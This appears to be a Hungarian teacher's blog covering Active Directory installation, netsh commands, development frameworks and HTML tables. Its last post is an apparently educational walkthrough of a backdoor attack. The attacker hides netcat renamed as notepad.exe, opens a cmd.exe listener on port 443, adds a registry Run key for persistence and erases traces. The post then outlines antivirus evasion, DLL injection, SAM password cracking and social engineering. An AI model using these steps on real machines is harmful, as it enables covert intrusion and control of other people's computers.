2018. március 27., kedd

telepítés beállítás


AD DC TELEPÍTÉS

Az Active Directory telepítést négyféle módszer alapján tudunk elvégezni:  Server Managerből, grafikus felületű varázslókkal  Server Managerből, Powershell alapon  Unattend telepítéssel (DCPromo)  Virtuális tartományvezérlő klónozásával


Start Server Manager.
Click Manage > Add Roles and Features.
Click Next until you reach Features.
Enable Active Directory module for Windows PowerShell in Remote Server Administration Tools > Role Administration Tools > AD DS and AD LDS Tools.

VAGY

Add-WindowsFeature RSAT-AD-PowerShell

ENTer-PSsession MyDomainConroller

+

$S = New-PSSession -ComputerName MyDomainConroller

Import-Module -PSsession $S -Name ActiveDirectory

+

$S = New-PSSession -ComputerName MyDomainController

Export-PSsession -Session $S -Module ActiveDirectory -OutputModule RemoteAD

Remove-PSSession -Session $S

Import-Module RemoteAD
------------
A kiszolgálónk felvétele egy már meglévő tartományba:

Install-ADDSDomainController –Credential (get-credential domain2012.local\Administrator) -CreateDNSDelegation –DomainName domain2012.local –DatabasePath "c:\NTDS" –SYSVOLPath "c:\SYSVOL" –LogPath "c:\Logs" 

Új Forest létrehozása:
Install-ADDSForest [-SkipPreChecks] –DomainName <string> SafeModeAdministratorPassword <SecureString> [CreateDNSDelegation] [-DatabasePath <string>] [DNSDelegationCredential <PS Credential>] [-NoDNSOnNetwork] [DomainMode <DomainMode> {Win2003 | Win2008 | Win2008R2 | Win2012}] [-DomainNetBIOSName <string>] [-ForestMode <ForestMode> {Win2003 | Win2008 | Win2008R2 | Win2012}] [-InstallDNS] [LogPath <string>] [-NoRebootOnCompletion] [-SkipAutoConfigureDNS] [-SYSVOLPath] [-Force] [-WhatIf] [-Confirm] [<CommonParameters>] 
Install-ADDSForest –DomainName domain2012.local –CreateDNSDelegation – DomainMode Win2008R2 –ForestMode Win2008R2 –DatabasePath "c:\NTDS" –SYSVOLPath "c:\SYSVOL" –LogPath "c:\Logs" 
Új gyerektartomány létrehozása:
Install-ADDSDomain [-SkipPreChecks] –NewDomainName <string> ParentDomainName <string> -SafeModeAdministratorPassword <SecureString> [-ADPrepCredential <PS Credential>] [AllowDomainReinstall] [-CreateDNSDelegation] [-Credential <PS Credential>] [-DatabasePath <string>] [-DNSDelegationCredential <PS Credential>] [-NoDNSOnNetwork] [-DomainMode <DomainMode> {Win2003 | Win2008 | Win2008R2 | Win2012}] [DomainType <DomainType> {Child Domain | TreeDomain} [-InstallDNS] [-LogPath <string>] [-NoGlobalCatalog] [-NewDomainNetBIOSName <string>] [NoRebootOnCompletion] [-ReplicationSourceDC <string>] [-SiteName <string>] [-SkipAutoConfigureDNS] [-Systemkey <SecureString>] [SYSVOLPath] [-Force] [-WhatIf] [-Confirm] [<CommonParameters>] 
Modern munkakörnyezet építése
56
Install-ADDSDomain –SafeModeAdministratorPassword –credential (getcredential domain2012.local\Administrator) –NewDomainName child – ParentDomainName domain2012.local –InstallDNS – CreateDNSDelegation –DomainMode Win2003 –ReplicationSourceDC DC1.domain2012.local –SiteName Office –DatabasePath "d:\NTDS" – SYSVOLPath "d:\SYSVOL" –LogPath "e:\Logs" –Confirm:$False


Core verzión
dcpromo.exe /adv


Unapted mód

A telepítés befejeztével létre kell hoznunk egy unattend.txt nevű fájlt, amely tartalmazza a telepítésre vonatkozó információkat. A telepítési beállításokat a következő paranccsal tudjuk kilistázni.
dcpromo.exe /?Promotion >  promotion.txt
Mivel elég sok telepítési kapcsoló létezik, ezért fenti parancs egy txt fájlba exportálja a kapcsolókat a könnyebb áttekinthetőség kedvéért. Nyissunk meg egy üres unattend.txt fájlt a notepad.exe-vel, és a fenti kapcsolók segítségével írjuk bele a telepítési válaszainkat, például a következőt:
[DCInstall] SafeModeAdminPassword=Passw0rd ReplicaOrNewDomain=Replica ReplicaDomainDNSName=domain2012.local InstallDNS=Yes ConfirmGC=Yes DomainLevel=4 UserName=Administrator UserDomain=Domain2012.local Password=Passw0rd
Mindezek után már csak ki kell adnunk a parancsot:
Windows Server 2012, Windows 8 és Office 365 alapokon
57
dcpromo /unattend:unattend.txt
A telepítés után a fenti kapcsolók értelmében újraindul a kiszolgáló

Frissités
adprep /forestprep  adprep /domainprep

Tartományvezérlő klónozás

Add-ADGroupMember –Identity "CN=Cloneable Domain Controllers,CN=Users, DC=domain2012,DC=local" –Member "CN=DC03,OU=Domain Controllers,DC=domain2012,DC=local"

PS
PowerShellből:
$path = Get-ChildItem "C:\CloneDCs\DC03\DC03\Virtual Machines" $vm = Import-VM –Path $path.fullname –Copy -GenerateNewId Rename-VM $vm DC04

msjd infitás
Start-VM –Name DC03 –ComputerName HyperV1 Start-VM –Name DC04 –ComputerName HyperV1

https://m.ipon.hu/elemzesek/micsoda-es-mire-jo-egy-nas/3176

2018. március 26., hétfő

Netsh parancsok

A Netsh eszköz egy parancssori parancsfájl-segédprogram, amely helyi vagy távolról lehetővé teszi, hogy megjelenítse vagy módosítsa a jelenleg futó számítógép hálózati konfigurációját. A Netsh eszköz hasznos funkciót nyújt, amely lehetővé teszi parancsok csoportjának futtatását batch módban. A Netsh archívumban mentheti a parancsok listáját szövegfájlba, vagy segíthet más kiszolgálók ugyanúgy konfigurálni.
LAN üzenetküldő szoftver
Fejlett LAN Instant Messenger
Terminálkiszolgáló kompatibilis
Parancssori felület
Csak olvasható / csak válaszüzemmódok
Nincs szükség szerverre
Ideális az Office Intranet számára
LanTalk NET Messenger


NETSH COMMAND INTERNAL HELP
C:\netsh
netsh>help

The following commands are available:

Commands in this context:
..             - Goes up one context level.
?              - Displays a list of commands.
abort          - Discards changes made while in offline mode.
add            - Adds a configuration entry to a list of entries.
alias          - Adds an alias.
bridge         - Changes to the `netsh bridge' context.
bye            - Exits the program.
commit         - Commits changes made while in offline mode.
delete         - Deletes a configuration entry from a list of entries.
diag           - Changes to the `netsh diag' context.
dump           - Displays a configuration script.
exec           - Runs a script file.
exit           - Exits the program.
firewall       - Changes to the `netsh firewall' context.
help           - Displays a list of commands.
interface      - Changes to the `netsh interface' context.
offline        - Sets the current mode to offline.
online         - Sets the current mode to online.
popd           - Pops a context from the stack.
pushd          - Pushes current context on stack.
quit           - Exits the program.
ras            - Changes to the `netsh ras' context.
routing        - Changes to the `netsh routing' context.
set            - Updates configuration settings.
show           - Displays information.
unalias        - Deletes an alias.
winsock        - Changes to the `netsh winsock' context.
The following sub-contexts are available:

bridge diag firewall interface ras routing winsock

To view help for a command, type the command, followed by a space, and then type ?.

netsh> ?


NETSH CONTEXTS
Netsh utility interacts with others using dynamic-link library files. Each Netsh helper DLL provides an extensive set of features called a context, which is a group of commands specific to this DLL networking component. These contexts extend the functionality of netsh. For ex., Dhcpmon.dll provides netsh the context and set of commands necessary to configure and manage DHCP settings.

For more information about Netsh contexts, use this command in the netsh shell:

netsh>show helper
DLL Filename  Command
------------  -------
HNETMON.DLL   bridge
DGNET.DLL     diag
FWCFG.DLL     firewall
IFMON.DLL     interface
IFMON.DLL       ip
IPV6MON.DLL     ipv6
IPV6MON.DLL       6to4
IPV6MON.DLL       isatap
IPV6MON.DLL     portproxy
RASMONTR.DLL  ras
RASMONTR.DLL    aaaa
RASMONTR.DLL    appletalk
RASMONTR.DLL    ip
RASMONTR.DLL    ipx
RASMONTR.DLL    netbeui
IPMONTR.DLL   routing
IPMONTR.DLL     ip
IPPROMON.DLL      autodhcp
IPPROMON.DLL      dnsproxy
IPPROMON.DLL      igmp
IPPROMON.DLL      nat
IPPROMON.DLL      ospf
IPPROMON.DLL      relay
IPPROMON.DLL      rip
IPPROMON.DLL      routerdiscovery
IPXMONTR.DLL    ipx
IPXPROMN.DLL      netbios
IPXPROMN.DLL      rip
IPXPROMN.DLL      sap
IFMON.DLL     winsock
netsh>

LIST OF AVAILABLE NETSH CONTEXTS
AAAA - commands for AAAA
Shows and sets the configuration of the Authentication, Authorization, Accounting, and Auditing (AAAA) database used by the Internet Authentication Service (IAS) and the Routing and Remote Access service.

DHCP - commands for DHCP
Administers DHCP servers and provides an equivalent alternative to console-based management.

Diag - diagnostic (diag) commands
Administers and troubleshoots operating system and network service parameters.

Interface - commands for Interface IP
Configures the TCP/IP protocol (including addresses, default gateways, DNS servers, and WINS servers) and displays configuration and statistical information.

RAS - commands for RAS
Administers remote access servers.

Routing - commands for Routing
Administers Routing servers.

WINS - commands for WINS
Administers WINS servers.


NETSH USAGE FROM COMMAND LINE, NETSH SYNTAX
netsh -a AliasFile -c Context -r RemoteComputer NetshCommand

or

netsh -a AliasFile -c Context -r RemoteComputer -f ScriptFile

-r : Configures a remote computer.

RemoteComputer : Specifies the remote computer to configure.

NetshCommand : Specifies the netsh command that you want to run.

-f : Exits Netsh.exe after running the script.

ScriptFile : Specifies the script that you want to run.

/? : Displays help at the command prompt.

NETSH EXAMPLES

SHOW NETWORK DIAGNOSTIC GUI
Type the following command:

netsh diag gui


SWITCH THE SPECIFIED ADAPTER FROM A STATIC ADDRESS TO DHCP
Type the following command:

netsh interface ip set address "Local Area Connection" dhcp

NOTE: Typing this command changes the interface named "Local Area Connection" to DHCP. To display all of the adapters in the computer with their current IP addresses to determine the correct adapter name, type the following command:

Netsh interface ip show config

To change to a static address, type the following command:

netsh interface ip set address "Local Area Connection" static ipaddr subnetmask gateway metric

NOTE: Replace ipaddr with the static IP address, subnetmask with the subnet mask, gateway with the default gateway and, if necessary, metric with the appropriate metric. The following example changes the interface "Local Area Connection" to a static address of 192.168.0.10 with a subnet mask of 255.255.255.0, and the interface has a default gateway of 192.168.0.1 with a metric of 1:

netsh interface ip set address "Local Area Connection" static 192.168.0.10 255.255.255.0 192.168.0.1 1


SHOW MULTICAST JOINS FOR AN EACH NETWORK INTEFACE
Type the following command:

netsh interface ip show joins


GATHERING DIAGNOSTIC DATA FROM WINDOWS FIREWALL
Windows Firewall configuration and status information can be retrieved at the command line by using the Netsh.exe tool. This tool adds IPv4 firewall support to the following Netsh context:

netsh firewall

To use this context, type netsh firewall at a command prompt, and then use additional Netsh commands as needed. The following commands are useful for gathering firewall status and configuration information:

Netsh firewall show state
Netsh firewall show config
Supported data gathering and configuration commands are listed in the following table.

Note Settings can be modified only by an administrator.

Data GatheringCommand Description

show allowedprogram Displays the allowed programs.
show config Displays the detailed local configuration information.
show currentprofile Displays the current profile.
show icmpsetting Displays the ICMP settings.
show logging Displays the logging settings.
show opmode Displays the operational mode.
show portopening Displays the excepted ports.
show service Displays the services.
show state Displays the current state information.
show notifications Displays the current settings for notifications.

Példák netsh interface ip show config
netsh interface ip set
  address "Local Area
  Connection" static
  192.168.0.10 255.255.255.0
  192.168.0.254


netsh interface ip set
  address "Local Area
  Connection" dhcp



netsh interface ip set dns
  "Local Area Connection"
  static 192.168.0.2



netsh interface ip set dns
"Local Area Connection" dhcp


10. Show TCP/IP settings—The command

netsh interface ip show config

SPONSORED CONTENT
Ransomware: All Locked Up and No Place to Go
MAR 13, 2018
shows the system's current TCP/IP configuration settings. You can see whether the system is using DHCP or static addressing as well as view the system's current IP address, subnet mask, gateway address, and DNS servers.

9. Change network configuration—Netsh can change the current network configuration. The command

netsh interface ip set
  address "Local Area
  Connection" static
  192.168.0.10 255.255.255.0
  192.168.0.254
sets the IP address of the system configuration Local Area Connection to 192.168.0.10, the subnet mask to 255.255.255.0, and the gateway address to 192.168.0.254. This use of Netsh comes in handy for laptops that must switch between static and dynamic addressed networks.

8. Use a dynamic DHCP assigned address—The command

netsh interface ip set
  address "Local Area
  Connection" dhcp
sets the IP address of the Local Area Connection system configuration to use DHCP addressing.

7. Change a DNS server address—When you change the system's IP address type, you almost always have to change the DNS server's address as well. The command

netsh interface ip set dns
  "Local Area Connection"
  static 192.168.0.2
configures the Local Area Connection to use a DNS server whose address is 192.168.0.2.


6. Dynamically assign the DNS server address—When you switch to dynamic DHCP addressing, you typically also want the DNS server address to be assigned dynamically. The command

netsh interface ip set dns
"Local Area Connection" dhcp
sets the Local Area Connection interface to use a DHCP-assigned DNS address.

5. Configure a WINS server—Netsh also lets you configure WINS servers. The following command configures a system's Local Area Connection interface to use a WINS server that has the IP address 192.168.100.3.

netsh interface ip set wins
  "Local Area Connection"
  static 192.168.100.3
4. Work with other interfaces—Netsh works with DHCP, Internet Authentication Service (IAS), and RAS interfaces as well as the local network interface. The command

netsh dhcp dump > dhcpcfg.dat
dumps the local DHCP server's configuration to the dhcpcfg.dat file. You can use this file in conjunction with Netsh to recreate the DHCP server.

3. Work with remote systems—One of Netsh's best hidden features is its ability to work with remote systems. The command

netsh set machine remotecomputer
sets the current computer to a different system on the network.

2. Save the current configuration—The Interface Dump subcommand saves your current network configuration and generates a script that you can use to regenerate the configuration. The command

netsh interface dump >
  mycfg.dat
redirects the Dump command to the mycfg.dat file.

1. Restore network configuration—The Netsh Exec command runs a Netsh script file. The command

netsh exec mycfg.dat
restores to your system the network configuration data that the preceding sample command saved.10. Mutassa a TCP / IP beállításokat - A parancsot


netsh interfész ip show config


a rendszer aktuális TCP / IP konfigurációs beállításait mutatja. Megtekintheti, hogy a rendszer DHCP-t vagy statikus címzést használ-e, valamint megtekinti a rendszer aktuális IP-címét, alhálózati maszkját, átjáró címét és DNS-kiszolgálóit.

9. Hálózati konfiguráció módosítása - A Netsh módosíthatja az aktuális hálózati konfigurációt. A parancs

netsh interface ip set
  címe "Helyi terület
  Kapcsolat "statikus
  192.168.0.10 255.255.255.0
  192.168.0.254
beállítja a rendszer konfiguráció helyi területi kapcsolatának IP-címét 192.168.0.10-re, az alhálózati maszkot 255.255.255.0-ra és az átjáró címét a 192.168.0.254-re. Ez a Netsh használata hasznos a laptopokhoz, amelyeknek statikus és dinamikus címzett hálózatok között kell változnia.

8. Dinamikus DHCP hozzárendelt cím használata - A parancs

netsh interface ip set
  címe "Helyi terület
  Csatlakozás "dhcp
beállítja a helyi hálózati kapcsolat konfigurációjának IP-címét a DHCP címzés használatára.

7. Módosítsa a DNS-kiszolgáló címét - A rendszer IP-címének megváltoztatásakor szinte mindig meg kell változtatnia a DNS-kiszolgáló címét is. A parancs

netsh felület ip set dns
  "Helyi kapcsolat"
  statikus 192.168.0.2
konfigurálja a Helyi kapcsolatot, hogy olyan DNS-kiszolgálót használjon, amelynek címe 192.168.0.2.


6. Dinamikusan rendelje hozzá a DNS-kiszolgáló címét. Amikor dinamikus DHCP címzésre vált, akkor általában azt szeretné, hogy a DNS-kiszolgáló cím dinamikusan legyen kijelölve. A parancs

netsh felület ip set dns
"Helyi kapcsolat" dhcp
a DHCP-hozzárendelt DNS-cím használatához a helyi hálózati kapcsolat felületét állítja be.

5. Konfiguráljon egy WINS-kiszolgálót - A Netsh lehetővé teszi a WINS-kiszolgálók beállítását is. A következő parancs konfigurálja a rendszer Local Area Connection felületét egy WINS-kiszolgáló használatához, amelynek IP-címe 192.168.100.3.

netsh interface ip set nyer
  "Helyi kapcsolat"
  statikus 192.168.100.3
4. Munka más interfészekkel - A Netsh együttműködik a DHCP-vel, az Internetes hitelesítési szolgáltatással (IAS) és a RAS interfészekkel, valamint a helyi hálózati interfésszel. A parancs

netsh dhcp dump> dhcpcfg.dat
a helyi DHCP kiszolgáló konfigurációját a dhcpcfg.dat fájlra bontja. Ezt a fájlt a Netsh-rel együtt használva újra létrehozhatja a DHCP szervert.

3. Távoli rendszerek működtetése - Netsh egyik leginkább rejtett funkciója az, hogy képes távmodulokkal együttműködni. A parancs

netsh gépi remotecomputer
a jelenlegi számítógépet a hálózat egy másik rendszerére állítja be.

2. Mentse az aktuális konfigurációt - Az Interface Dump alkönyvtár megmenti az aktuális hálózati konfigurációját, és létrehoz egy parancsfájlt, amelyet a konfiguráció regenerálásához használhat. A parancs

netsh interfész dump>
  mycfg.dat
átirányítja a Dump parancsot a mycfg.dat fájlba.

1. A hálózati konfiguráció visszaállítása - A Netsh Exec parancs Netsh parancsfájlt futtat. A parancs

netsh exec mycfg.dat
visszaállítja a rendszerre az előző minta parancs mentett hálózati konfigurációs adatait.


Alkalmazásfejlesztési keretrendszerek 14_A

Drupál
Wordpress
Bootstrap
Codeigniter
Genezis

Az alkalmazásfejlesztési keretrendszerek rendkívüli mértékben képesek munkánkat megkönnyíteni, meggyorsítani és hatékonyabbá tenni. Mégis többször is látom, hogy a fejlesztők egyáltalán nem használnak keretrendszereket a munkájuk során. Azt hiszem, hogy ennek a legfőbb oka, hogy magyarul eléggé ritkán lehet hozzájuk dokumentációt találni.

Alkalmazásfejlesztési keretrendszerek
A keretrendszerek képesek munkánkat megkönnyíteni, meggyorsítani és hatékonyabbá tenni

A keretrendszerek olyan alapelemeket biztosító rendszerek amelyek összetett feladatokat képesek megoldani. Egy vázat adnak alkalmazásaink számára, melyet a fejlesztőnek már csak tovább kell építenie.

Ha nézünk mondjuk egy webes alkalmazást akkor van jó pár olyan feladat amit az alkalmazás funkciójától függetlenül kezelnünk kell. Ilyenek például a rövid URL-ek, a munkamenetek kezelése, vagy éppen az adatbázis kapcsolatok és lekérdezések működtetése. A különböző keretrendszerek ezekre kínálnak kész megoldásokat.

Előnyök
A fentiekből egyenesen következik, hogy a keretrendszerek használatával sok fejlesztési időt takaríthatunk meg. Az időmegtakarítás egyrészt abból jön, hogy a sztenderd feladatokat a keretrendszer maga automatikusan megoldja. Másrészt, ami legalább ugyanannyira fontos, a keretrendszerek általában rákényszerítenek bennünket valamilyen kódolási és file struktúrálási sztenderdre. Így pár hónap múlva ha újra hozzá kell nyúlni a kódhoz, akkor egyértelműen tudni fogjuk, hogy mit hol keressünk. A sztenderdizálás további haszna, hogy jelentősen megkönnyíti a csoportmunkát. Röviden egy átláthatóbb, könnyebben fenntartható kódot kapunk.

Hátrányok
Tanulásukhoz idő kell. Talán ez az egyetlen hátrányuk. Tapasztalatom szerint egy keretrendszer megtanulására fordított idő rövid távon már az első projekt esetén megtérül, hosszú távon pedig összehasonlíthatatlan a különbség. Némely keretrendszer e mellett nem kellőképpen rugalmas, és az automatizált eljárások hatására időnként nem a legoptimálisabb háttérfolyamatokat kapjuk.

PHP keretrendszerek
Jelen pillanatban 4 népszerű PHP-s keretrendszer van. A Zend, a CakePHP, a Symfony és a CodeIgniter.

Többé kevésbé azonos tudásúak, azonos a tanulásukra fordítandó idő, azonos licensz alá tartoznak. Azt hiszem, hogy az esetek majd’ 100%-ában az történik, hogy amelyikkel az ember elkezd dolgozni azután arra esküszik és az összes többi nehézkesnek és bugyutának tűnik. Szóval aki még nem kötelezte el magát az katt ide.

JavaScript keretrendszerek
Webfejlesztés esetén nagy valószínűséggel a szerver oldali keretrendszerek mellett bizonyára szükségünk lesz valamilyen kliens oldali keretrendszerre is. Ezek közül a Yahoo! User Interface (YUI), a Prototype és a Dojo a legnépszerűbbek.

A JavaScript keretrendszerek egyik legfontosabb tulajdonsága, hogy keresztplatformossá teszik használatukkal a JavaScript alkalmazást, azaz kiszűrik a különböző böngészők eltérő JavaScript kezeléséből adódó problémák nagy részét.

Használati szempontból nagyjából ugyanaz igaz rájuk mint a PHP-sekre, azaz ha az ember elkezdi használni az egyiket akkor arra és csak arra esküszik. Szóval aki még nem használja egyiket sem annak azt mondom, hogy prototype és script.aculo.us.

Összefoglalás
Ez az általános és rendkívül rövidke bemutató nem vállalta fel azt a feladatot, hogy konkrétan bemutassuk egyik vagy másik keretrendszer használatát. A cél csupán annyi volt, hogy minden webfejlesztő figyelmét felhívjam arra, hogy mennyit nyerünk azzal ha elkezdünk valamilyen alkalmazás fejlesztési keretrendszert használni webes fejlesztéseinkhez. Sok időt nyerünk használatukkal és jobban kezelhető és fenntartható kódot eredményeznek. Mindezért egy rövidke tanulási idővel kell fizetnünk, ami egyértelműen egy jó üzlet. Egyetlen figyelmeztetésem van. Ha valaki elkezd keretrendszerekkel dolgozni utána már nem hajlandó többet nélkülük dolgozni…

A Moodle egy nyílt forráskódú, ingyenes (GNU GPL) licenc alatt terjesztett, PHP nyelven íródott eLearning keretrendszer.

https://www.oktatas.hu/pub_bin/dload/kozoktatas/pok/Budapest/szaktanacsadoi_anyagok/informatika_lms_rendszerek.pdf

https://gyires.inf.unideb.hu/GyBITT/10/ch03s02.html

Igazítások html-ben 9. osztály













<TABLE WIDTH=50% CELLPADDING=15>
 <TR><TD ALIGN=right>Ha<BR>elhagyjuk<BR>
     a<BR>táblázat<BR>keretét<BR>és<BR>
     színét<BR>is</TD>
     <TD>akkor<BR>észre<BR>se<BR>nagyon
     <BR>vesszük,<BR>hogy<BR>táblázatot
     <BR>látunk</TD> </TR> </TABLE>

A html lap "BODY" sorában "BACKGROUND=képfájlnév" formában háttérképet adhatunk meg. Ha emellett még a "BGPROPERTIES=fixed" paramétert is beírjuk a sorba, akkor egyes böngészők a html lap scrollozása közben nem mozgatják a hátteret.
Ha háttérkép helyett háttérszínt akarunk megadni, akkor ezt a "BODY" sorába írt "BGCOLOR=szín" paraméterrel tehetjük. A "szín" vagy a szín angol neve, vagy #RGB-kód lehet, ahogy erről korábban már volt szó. Szintén a "BODY" sorába írt "TEXT=szín" paraméterrel az egész html lap betűszínét adhatjuk meg, amitől aztán <FONT COLOR=szín> és </FONT> közötti szövegrészekben eltérhetünk.
Ahogy az előző két paragrafust kezdő P parancsban látható, megadhatunk egy paragrafusra nem balra történő szöveg illesztést is.
Ha egy html lapon sok egymás utáni paragrafust (pl. a teljes lapot) akarjuk (pl. balra és jobbra is) illeszteni, akkor célszerű az illesztendő részt egy nagyobb egységgé (ún. "DIV" blokká) kiemelni, és a DIV-be írni az illesztést, ahogy azt itt tettük. A DIV-nek illik megjelölni a végét.

Amint látható, az egymás melletti vagy alatti táblázatcellák összevonhatók.












<P><TABLE WIDTH=100% BORDER=1
     BGCOLOR=limegreen CELLPADDING=15>
 <TR><TD WIDTH=25%>
     Első sor</TD><TD COLSPAN=3>
     három összevont oszloppal</TD></TR>
 <TR><TD ROWSPAN=2>2. és 3. sor 1.
     oszlopa összevonva</TD>
     <TD WIDTH=25%>Ez a</TD>
     <TD WIDTH=25%>2.</TD>
     <TD WIDTH=25%>sor</TD></TR>
 <TR><TD>Ez a</TD><TD>3.</TD><TD>sor</TD>

     </TR>

<CENTER><TABLE WIDTH=98% BORDER=0
          CELLPADDING=0 CELLSPACING=0
 <TR><TD BGCOLOR=yellow>
  <TABLE CELLPADDING=16 CELLSPACING=1
         WIDTH=100% BORDER=0>
   <TR><TD BGCOLOR=deepskyblue>
    Sokan kedvelik azt a keretet,
    amit nem a BORDER-rel lehet megadni,
    hanem azzal, amit egy színes (itt
    sárga) táblázatcellának a nála 1-el
    kisebb méretű (CELLSPACING=1)
    táblázat által le nem takart része
    eredményez.
   </TD></TR><TR><TD BGCOLOR=deepskyblue>
    Ennek a keretnek a színe független a
    betűszíntől, a formája is más, mint
    a BORDER-el kapott kereté.
  </TD></TR></TABLE>
 </TD></TR></TABLE>

Tipográfia és színesztétika

http://www.color-hex.com/color/00bfff

http://www.htmlcodes.ws/color/html-color-code-generator.cfm?colorName=DeepSkyBlue

https://www.quackit.com/html/codes/color/color-tester.cfm?colorName=DeepSkyBlue

https://www.w3schools.com/colors/color_tryit.asp

http://www.htmlcsscolor.com/hex/00CCFF

http://www-db.deis.unibo.it/courses/TW/DOCS/w3schools/colors/color_tryit.asp-color=DeepSkyBlue.html

https://css-tricks.com/snippets/css/named-colors-and-hex-equivalents/

https://eletszepitok.hu/harmonikus-szintarsitasok-lakberendezes-2/


http://elte.prompt.hu/sites/default/files/tananyagok/VizualizacioATudomanykommunikacioban/ch04s03.html

http://elte.prompt.hu/sites/default/files/tananyagok/VizualizacioATudomanykommunikacioban/ch05.html

2018. március 23., péntek

Nézzünk egy egyszerű támadást 14_A

Legyen a megtámadott számítógép tulajdonosának neve Ali.
Tehát Ali gépéhez oda kell menni( és futtason egy windowxs 7-es operációs rendszer)
Otthon a támadó, nevezzük most Eve-nek letöltöte a netcat legújabb windows-os verzióját az internetről, rátette a maga kis penrivejára és bemásolta Ali egy tetszőleges mappájába
A fájlt rejteté tete, és a biztonság kedvéért átnevezte pl. notepad.exe-re Az eredmény az let,ha elindítják hogy a task managertben fut egy folyamat notepad.exe néven. De nem tudja Alice leállítani, mert a task manager az argv[0] alapján azonosítja a programokat, és a notepad.exe egy rendszerfájl lett ha így akarja futtatni mégpedig system jogokkal.
----------------------
Ezután Eve fogta magát és nyitott egy parancssort.
megkereste az átnevezet netcat elérési útját, és csinált egy úgynevezet reverse shell-t. Ezzel a parancsal:
notepad.exe -l -d 443 -e "cmd.exe"
Ezután a gonosz Eve mindig el szerette volna érni Alice gépét,emiatt létrehozott egy registry bejegyzést a gépen
HKEY_CURRENT_USER\\Software\\Microsot\\Windows\CurrentVersion\ run
Létrehozott egy új string bejegyzést notepad néven
értéke pedig
[az átnevezet elérési útú netcat] -l -d 443 -e "cmd.exe"
A szögletes zárojel nem kell csupán nem tom ki hova másolja a programot.
Ezzel elértük azt, hogy egy folyamat minden elinduláskor elindul. Ezen kívül Eve kinézte az ipconfig/all parancsal
Ali gépének belső ip címét.
Mikor végzet eltüntette nyomait:
azaz kitörölte magát a rescent documents-ből,kitörölte magát a tényt is hogy ő hozzácsatolta a pendrive-ot( magyarán törölt egy bizonyos registry kulcsot, ami a Default ágon található, azonban a regedit nem jeleníti meg), plusz elrejtette a task managerből is a programot, amit most nem árulok el, hogy kell)
Ezután visszament Eve a saját gépéhez
lefuttatot egy parancsot rajta
telnet [Ali gépének ip címe] 443
És kapot egy parancssori ablakot
Ezután ha akar csinálhat egy fájlt program.vbs néven így
edig program.vbs
Beírja az editorba:
Msgbox("Helló Ali most törtem fel a gépedet!!! HAHAHAHAHA")
elmenti a fájlt
és lefuttatja
cscript program.vbs
Ekkor ha nem rontotam el a cscript paraméterezését, akkor lefut a program.vbs, ami létrehozott egy MessageBox-ot a Ali gépén és kiírta, a "Hello Ali most törtem fel a gépedet HAHAHAHAHA" szöveget a képrnyőjére.
Ekkor persze Ali szól Bobnak a rendszergazdának, aki egyetlen programmal megmondhatja, hogy bizony Eve törte fel a gépét, bár nyomot arra nem fog találni, hogy hogyan került be a nc a gépbe, de nem fogja tudni bezárni.

Ez egy szép kis módszer, de ez csak elmélet volt

Gyakorlatban:
-az netcat-et mára a legenyhébb vírusírtó is megtalálja. Ennek elkerülése véget Eve-nek lehetősége van xorolással és egy RC4 kulcs alkalmazásával titkosítani a netcat-et, így nem biztos meg fogja találni a vírusírtó Ki kell próbálni többféle kulcsot, többféle titkosítási módszert, előbb utóbb biztosan talál egy megfelelő kulcsot és módszert.
Az öntitkosító/önmódosító vírusokat csak assamblyben lehet írni, de mivel a netcat kódja nyílt is meg lehet próbálni onnan is módosítani.

-a tűzfal: na most ez a nem mind1 tényező: ugyanis port alapű tűzfalakra jó a parancs, hogy kiengedtem a 443-as porton a programot, de mára az összes tűzfal figyeli, hogy melyik alkalmazás megy ki a netre/hálózatra, és a netcat-ünk tuti nem lesz kint. Így vagy engedélyezzük( már ha van jogunk hozzá), vagy valamilyen egyébként is kiengedett alkalmazás kódjába másoljuk be a netcat-et.
Erre vannak módszerek:
-a DLL injekció(ennek is két fajtája van, ezt nem részletezném): pl. az internet explorer egyik dll-jébe beletesszük a netcat kódját megfelelően már a kódban felparaméterezzük, az internet explorer tuti ki van engedbve, és ha ezt és a titkosítást alklamazzuk, akkor nem fog meg a tűzfal ez olyan 90%
-A WriteProcessMemory függvény használata keresni az internet exploreben egy jó nagy stacket, amibe belefér az alaklmazásunk beleírjuk, ezután megkeressük tömböt meghívó függvény EIP regiszterét, és felülírjuk a saját programunk kezdő memóriacímének. Ez megint marhára nem egyszerű, de nem lehetetlen hogy valaki megcsinálja( persze mindkettő végrehajtásához eleve rendszergazdának kell lenni a gépen, vagy pedig kernel módból kell "kérni" egy handle-t az alkalmazásunkhoz. Ehhez valahogy megint rendszergazdai jogokat kell szerezni. De akkor már egyszerűbb kiengedni a tűzfallal, előnye a fenti kettő megoldásnak, hogy nem nagyon marad nyoma, sőt egyáltalán nem fog látszódni. Valamint a rendszergazdai jogok szerzése:
hát erre lehet alkalmazni különdféle overflow-okat( pl. , ha nincs jól frissítve a rendszer akkor nagy az esély rá, ha viszont jól frissítet, akkor is van rá módszer( pl. kidumpolni a SAM hive-ot,és egy nagyobb teljesítményű gépen, vagy netalán több nagyobb teljesítményű gépen, megpróbálni visszafejteni, ha nem túl bonyolult a jelszó, akkor vissza lehet fejteni a kódot megfelelő programmal brute-force alapon)
Végezetül: Az igazi hacker valahogy bejuttatja netcat-et a célszámítógép gépébe. Az egyik lehetőség: Socail Engeneering. Vagyis kitesz egy programot, a netre, hogy ez a pl. Crysis 3 crackje, vagy a windows 8-ra egy keygen, vagy egyszerűen egy weboldalon kiteszi, hogy az oldal megtekintéséhez egy plugin szükséges( ami az ő kódját tartalmazza), 100-ból 50 ember tui le fogja tölteni, illetve telepíteni fogja a tök ismeretlen plugint is.A másik lehetőség: pl. az internet explorerben, vagy egy más böngészőben, vagy egy a célszámítógépen használ keres egy stack vagy heap overflow-t, csinál rá egy exploitot, és payloadként bejutatja a saját netcat-jét. És ismét átvete az irányítást a gép felett. Persze mindezek előtt végigpróbálja a nagyobb exploit adatbázisokat, hogy hátha nincs frissítve az operációs rendszer. És a gyakorlatban nem a netcat-et használják, hanem annak egy módosított változatát a cryptonetcat-et, ami titkosítotan küldi ki az adatokat, de van olyan verzió is láncolt proxykon keresztül csatlakozik a célszámítógéphez és korszerű szteagnofráfiát is használ a kommunikáció elrejtésére.
